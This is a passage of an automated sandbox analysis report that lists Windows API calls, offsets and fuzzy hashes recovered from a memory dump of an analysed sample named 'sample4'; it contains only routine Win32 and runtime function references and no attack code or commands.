                                                                                                                                                                                                                                                                • EndDeferWindowPos.USER32(00000000), ref: 0012A405
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$Defer$Begin
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2880567340-0
                                                                                                                                                                                                                                                                • Opcode ID: 06b97bd8016c1c95363667287d0d643f8bd84610ed395eaa73415a75d6684a97
                                                                                                                                                                                                                                                                • Instruction ID: a2a66cf1ac98c26df1e215acf0ca673b64104069cff6a4892fa4c21d8fed8770
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 06b97bd8016c1c95363667287d0d643f8bd84610ed395eaa73415a75d6684a97
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A210E71E00219AFCB15EFA9EC48AAEBBF8FF48300F544169E505E3250DB74A9519B91
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GlobalFix.KERNEL32(00000000), ref: 00129E61
                                                                                                                                                                                                                                                                • lstrcmpW.KERNEL32(00000000,?), ref: 00129E72
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 00129EAF
                                                                                                                                                                                                                                                                • GlobalFix.KERNEL32(00000000), ref: 00129EB9
                                                                                                                                                                                                                                                                  • Part of subcall function 001266AB: GlobalFlags.KERNEL32(?), ref: 001266B8
                                                                                                                                                                                                                                                                  • Part of subcall function 001266AB: GlobalUnWire.KERNEL32(?), ref: 001266C6
                                                                                                                                                                                                                                                                  • Part of subcall function 001266AB: GlobalFree.KERNEL32(?), ref: 001266D2
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Global$AllocFlagsFreeWirelstrcmp
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 396917142-0
                                                                                                                                                                                                                                                                • Opcode ID: 2dfe9d6a403fb8cda15571d4d07d0528d604bc54c8ffaa0d06286e3dd0153036
                                                                                                                                                                                                                                                                • Instruction ID: 03c62efbccc1febd4cebf851de466ee1ebc094e8b0184b3abe994f191248e154
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2dfe9d6a403fb8cda15571d4d07d0528d604bc54c8ffaa0d06286e3dd0153036
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9D119E71040618BFEF22AFA5EC89DABBBACEF04744F10046AFA4190031DB71DDA0DB60
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • FindResourceW.KERNEL32(?,00000000,00000005), ref: 0012AE39
                                                                                                                                                                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 0012AE41
                                                                                                                                                                                                                                                                • LockResource.KERNEL32(?), ref: 0012AE4F
                                                                                                                                                                                                                                                                • FreeResource.KERNEL32(?), ref: 0012AE9F
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Resource$FindFreeLoadLock
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1078018258-0
                                                                                                                                                                                                                                                                • Opcode ID: 219a400e9dc2f7b7d6b39f8108f29dccdd8d86049cad80344db37fc5c9e0426e
                                                                                                                                                                                                                                                                • Instruction ID: afa7c57ccc03f9892301e2be5c5d670a9fa61531052bfc9441f42d1598c3e581
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 219a400e9dc2f7b7d6b39f8108f29dccdd8d86049cad80344db37fc5c9e0426e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8011E031500232EBCB249F94E808BB6B7B8FF44751F5680B5EC088B240EB749861D7B1
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetObjectW.GDI32(?,0000000C,?), ref: 0011FFD8
                                                                                                                                                                                                                                                                • SetBkColor.GDI32(?,?), ref: 0011FFE2
                                                                                                                                                                                                                                                                • GetSysColor.USER32(00000008), ref: 0011FFF2
                                                                                                                                                                                                                                                                • SetTextColor.GDI32(?,?), ref: 0011FFFA
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Color$ObjectText
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 829078354-0
                                                                                                                                                                                                                                                                • Opcode ID: b9b3f991460f2fa1263d74b5742b514e0a55305b517fb63307722d829547ad2d
                                                                                                                                                                                                                                                                • Instruction ID: d8db3cb735ddd840cbcbefc944b2bcc93d2ec1f85bddf8bfd03925db8d1bd669
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b9b3f991460f2fa1263d74b5742b514e0a55305b517fb63307722d829547ad2d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CD11C432600119ABEB15EF68AC48ABF73B9EF5E351F510614F925D3181DB30DC61C795
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(000D2D64), ref: 00126102
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,000D2D7C), ref: 00126112
                                                                                                                                                                                                                                                                • RtlEncodePointer.NTDLL(00000000), ref: 0012611B
                                                                                                                                                                                                                                                                • RtlDecodePointer.NTDLL(00289814), ref: 00126129
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Pointer$AddressDecodeEncodeHandleModuleProc
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2061474489-0
                                                                                                                                                                                                                                                                • Opcode ID: ade24616a7730516c3b720f68d706e78e3fb800a3702a3c3da135fa37f4f8696
                                                                                                                                                                                                                                                                • Instruction ID: 6a1a7f1e04780ca5136feb610bf85ed276bfeaa79e72f78b373334cac44b4238
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ade24616a7730516c3b720f68d706e78e3fb800a3702a3c3da135fa37f4f8696
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F311B33650022AFFCF126FA0EC099DE3F6AEB4D751B054115FE05A1160CB76D970AFA1
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetTopWindow.USER32(?), ref: 001226A1
                                                                                                                                                                                                                                                                • GetTopWindow.USER32(00000000), ref: 001226E4
                                                                                                                                                                                                                                                                • GetWindow.USER32(00000000,00000002), ref: 00122706
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2353593579-0
                                                                                                                                                                                                                                                                • Opcode ID: 1577824f2f2539a9d77bf0fe378cfbbba6693aca896a168efa8be306cc245e47
                                                                                                                                                                                                                                                                • Instruction ID: 91382e069e3e4d380363ee509e4e3b40ff3657fdae781cacc811d8a06bc344a4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1577824f2f2539a9d77bf0fe378cfbbba6693aca896a168efa8be306cc245e47
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DA01CC36105129BBCF126F91FC09EDE3B2ABF26351F054014FE1555060CB7ACAB5EBA6
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • FindResourceW.KERNEL32(?,?,000000F0), ref: 0011F978
                                                                                                                                                                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 0011F984
                                                                                                                                                                                                                                                                • LockResource.KERNEL32(00000000), ref: 0011F991
                                                                                                                                                                                                                                                                • FreeResource.KERNEL32(00000000,00000000), ref: 0011F9AD
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Resource$FindFreeLoadLock
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1078018258-0
                                                                                                                                                                                                                                                                • Opcode ID: 55354082d68ec9a3e4020d862371b10bf5515f1e9b394612ede0aa7c1abaceb1
                                                                                                                                                                                                                                                                • Instruction ID: 01b464cb34148bd4cf89eb311602ad6e70dbd1986fb6be7a69c1462a5a74a47c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 55354082d68ec9a3e4020d862371b10bf5515f1e9b394612ede0aa7c1abaceb1
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 03F0FF36601219BB8725BBA9AC48EAFB66CAB85B657190079FC0993201DF70CC4182A0
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,?), ref: 0011FA81
                                                                                                                                                                                                                                                                • GetTopWindow.USER32(00000000), ref: 0011FA8E
                                                                                                                                                                                                                                                                  • Part of subcall function 0011FA77: GetWindow.USER32(00000000,00000002), ref: 0011FADD
                                                                                                                                                                                                                                                                • GetTopWindow.USER32(?), ref: 0011FAC2
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$Item
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 369458955-0
                                                                                                                                                                                                                                                                • Opcode ID: e663817ef872ef5d6f47f06a66c3e442cebf20493938d915c182514aaa62b2d3
                                                                                                                                                                                                                                                                • Instruction ID: 45e96ec26b77cc05f65d6a3169d23a9369753a75983bd84fd2eec1fcd1e699cd
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e663817ef872ef5d6f47f06a66c3e442cebf20493938d915c182514aaa62b2d3
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DD016231101725BBCF2A6FA0BC08ADF3B18AF25750F054138FD1996111DB39C99296D1
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 00124BC8
                                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 00124BDB
                                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 00124BF5
                                                                                                                                                                                                                                                                • SetFocus.USER32(?,00000000,?,00000000,001200C4), ref: 00124C0E
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Parent$Focus
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 384096180-0
                                                                                                                                                                                                                                                                • Opcode ID: 75a2deb90fa5643471ceb315d510a6a6406b5f1f1ed08edf42c1fa72bab39df0
                                                                                                                                                                                                                                                                • Instruction ID: 5bda85f8bd6fb20a46be5ae32bc5a7be48af525259757b541656550ce994e0da
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 75a2deb90fa5643471ceb315d510a6a6406b5f1f1ed08edf42c1fa72bab39df0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A5F0A432A00A109FCB157BB4EC1DA2E77AABF98701305093AB446C3171EF70DC219B10
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • FindResourceW.KERNEL32(?,?,00000005), ref: 0012AF41
                                                                                                                                                                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 0012AF49
                                                                                                                                                                                                                                                                • LockResource.KERNEL32(00000000), ref: 0012AF56
                                                                                                                                                                                                                                                                • FreeResource.KERNEL32(00000000,00000000,?,?), ref: 0012AF6E
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Resource$FindFreeLoadLock
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1078018258-0
                                                                                                                                                                                                                                                                • Opcode ID: 4922a8965cd476005c940c4ae8dc854d7c2406f1bd9fac6c8383b8e59d99fc15
                                                                                                                                                                                                                                                                • Instruction ID: 9349101ad7ef7ee384021840004362b700618e97a514e42fd44774a0b074bde7
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4922a8965cd476005c940c4ae8dc854d7c2406f1bd9fac6c8383b8e59d99fc15
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 97F0B476500214BB8B00ABA8BC4CC9FFBBDEF956617114095FD05D3211EB758D1087A0
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(000D2D64), ref: 00125F12
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,000D2DB4), ref: 00125F22
                                                                                                                                                                                                                                                                • RtlEncodePointer.NTDLL(00000000), ref: 00125F2B
                                                                                                                                                                                                                                                                • RtlDecodePointer.NTDLL(00289820), ref: 00125F39
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Pointer$AddressDecodeEncodeHandleModuleProc
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2061474489-0
                                                                                                                                                                                                                                                                • Opcode ID: 83dbe4c1d4e305a6ddbd2e7b49bfba6a7248f19b43ed53ff3e67ddae79cef9b3
                                                                                                                                                                                                                                                                • Instruction ID: 9f2a56cba06c42d7af263b8f1e0c113f473714ab5f6e5b47d46d28465b5306fd
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 83dbe4c1d4e305a6ddbd2e7b49bfba6a7248f19b43ed53ff3e67ddae79cef9b3
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A1F05435505726AF8F156FA0BD4DD6A3F6AEB097517060151FD06D2220DB71C8609FA0
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(000D2D14), ref: 00126485
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,000D2D2C), ref: 00126495
                                                                                                                                                                                                                                                                • RtlEncodePointer.NTDLL(00000000), ref: 0012649E
                                                                                                                                                                                                                                                                • RtlDecodePointer.NTDLL(0028980C), ref: 001264AC
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Pointer$AddressDecodeEncodeHandleModuleProc
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2061474489-0
                                                                                                                                                                                                                                                                • Opcode ID: a7bd71ea57bb1af8dd6295f75c80d6a14fd99c35c8d0fb313517b1bcb456ccbb
                                                                                                                                                                                                                                                                • Instruction ID: bfd33b1914b8e425ab240705cda98430312d413ae3306849137c0e0118194af1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a7bd71ea57bb1af8dd6295f75c80d6a14fd99c35c8d0fb313517b1bcb456ccbb
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B1F05E3960136AABCF167F60FC1D96A3FA9AF497503068111FD0596264DB74CC608FA0
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(000D20E8), ref: 0012601E
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,000D2CF8), ref: 0012602E
                                                                                                                                                                                                                                                                • RtlEncodePointer.NTDLL(00000000), ref: 00126037
                                                                                                                                                                                                                                                                • RtlDecodePointer.NTDLL(00289808), ref: 00126045
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Pointer$AddressDecodeEncodeHandleModuleProc
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2061474489-0
                                                                                                                                                                                                                                                                • Opcode ID: b1c6d387ea71db310183711faaa04380bfe98644ee36f216dbc0be409bb8a78f
                                                                                                                                                                                                                                                                • Instruction ID: 9a6b055ca14edd843e44d01bea51189c46897353aa80fc994facebb55dfe3b65
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b1c6d387ea71db310183711faaa04380bfe98644ee36f216dbc0be409bb8a78f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 92F03039641336AF8B312B74BC0D9AA7E9CDF49B517168121FD05D22A0DF70CC90AAA4
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(000D2D64), ref: 001263D6
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,000D2DC8), ref: 001263E6
                                                                                                                                                                                                                                                                • RtlEncodePointer.NTDLL(00000000), ref: 001263EF
                                                                                                                                                                                                                                                                • RtlDecodePointer.NTDLL(00289824), ref: 001263FD
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Pointer$AddressDecodeEncodeHandleModuleProc
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2061474489-0
                                                                                                                                                                                                                                                                • Opcode ID: 4fc635ffc5e343d964cc7f7f96d7d45a32ae7dcf7927e156d55aa3d74bc47194
                                                                                                                                                                                                                                                                • Instruction ID: 104197706ca7e059a148e0996a7fb8b170184a5beebe1c59a44f342fb3edd8f5
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4fc635ffc5e343d964cc7f7f96d7d45a32ae7dcf7927e156d55aa3d74bc47194
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9FF08235641336AB8B253B60BC0D96A3E9CAB497517064162FD46D62A0DB70CC908AB4
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(000D2D14,00000000,0011E3A3), ref: 00126431
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,000D2D48), ref: 00126441
                                                                                                                                                                                                                                                                • RtlEncodePointer.NTDLL(00000000), ref: 0012644A
                                                                                                                                                                                                                                                                • RtlDecodePointer.NTDLL(00289810), ref: 00126458
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Pointer$AddressDecodeEncodeHandleModuleProc
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2061474489-0
                                                                                                                                                                                                                                                                • Opcode ID: 01344d6ff6adad5e0ef49867bab0071741ab703ec848ec6df4ce1f64443abb7c
                                                                                                                                                                                                                                                                • Instruction ID: e2a8cdae78a47168783b771135777cea6ee00fc642acf2008181d347349e6703
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 01344d6ff6adad5e0ef49867bab0071741ab703ec848ec6df4ce1f64443abb7c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 16E0D8357013329F8B103B707C0DA6A3A9DAF41B513064621FD42D62A8DF60CC918EB0
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • WriteConsoleW.KERNEL32(00000000,00000020,00000000,00000000,00000000,?,002650D0,00000000,00000001,00000000,00000000,?,0025F48C,00000000,002811B0,00000000), ref: 00265DCF
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,002650D0,00000000,00000001,00000000,00000000,?,0025F48C,00000000,002811B0,00000000,00000000,00000000,?,0025F9E0,00000010), ref: 00265DDB
                                                                                                                                                                                                                                                                  • Part of subcall function 00265DA1: CloseHandle.KERNEL32(00283870,00265DEB,?,002650D0,00000000,00000001,00000000,00000000,?,0025F48C,00000000,002811B0,00000000,00000000,00000000), ref: 00265DB1
                                                                                                                                                                                                                                                                • ___initconout.LIBCMT ref: 00265DEB
                                                                                                                                                                                                                                                                  • Part of subcall function 00265D63: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00265D92,002650BD,00000000,?,0025F48C,00000000,002811B0,00000000,00000000), ref: 00265D76
                                                                                                                                                                                                                                                                • WriteConsoleW.KERNEL32(00000000,00000020,00000000,00000000,?,002650D0,00000000,00000001,00000000,00000000,?,0025F48C,00000000,002811B0,00000000,00000000), ref: 00265E00
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2744216297-0
                                                                                                                                                                                                                                                                • Opcode ID: d3360b3c1075a2d194b22d5a46c6d29dc2b9d7ab98da42214969b1625de49649
                                                                                                                                                                                                                                                                • Instruction ID: 4d119bb70b81a7418fff8435898109714da448ada7108a89951b045c45d80fc8
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d3360b3c1075a2d194b22d5a46c6d29dc2b9d7ab98da42214969b1625de49649
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A8F01C36010625BBCF222F95EC0CA8A3F66EF897A0F144010FE1886130DB32C9709B90
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetDlgCtrlID.USER32 ref: 00120EDF
                                                                                                                                                                                                                                                                  • Part of subcall function 00118C1C: __EH_prolog3.LIBCMT ref: 00118C23
                                                                                                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 00120F61
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CtrlH_prolog3H_prolog3_
                                                                                                                                                                                                                                                                • String ID: ${(
                                                                                                                                                                                                                                                                • API String ID: 2613406074-964378601
                                                                                                                                                                                                                                                                • Opcode ID: 246b32ab951a3c979a4f65bb9077b751283b0183ecad5ac03caa8c3d7c60430b
                                                                                                                                                                                                                                                                • Instruction ID: e6a1bb3091f97a8d6a853efc3d4ed219eba338d280f3971c12884949e002da24
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 246b32ab951a3c979a4f65bb9077b751283b0183ecad5ac03caa8c3d7c60430b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D9219235A10314AFCB14EFA4D981AAEB3B9FF58310F104569F959A7282DF70AD61CF50
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetKeyState.USER32(00000011), ref: 00139122
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000B0,0000002E,?), ref: 00139166
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSendState
                                                                                                                                                                                                                                                                • String ID: .
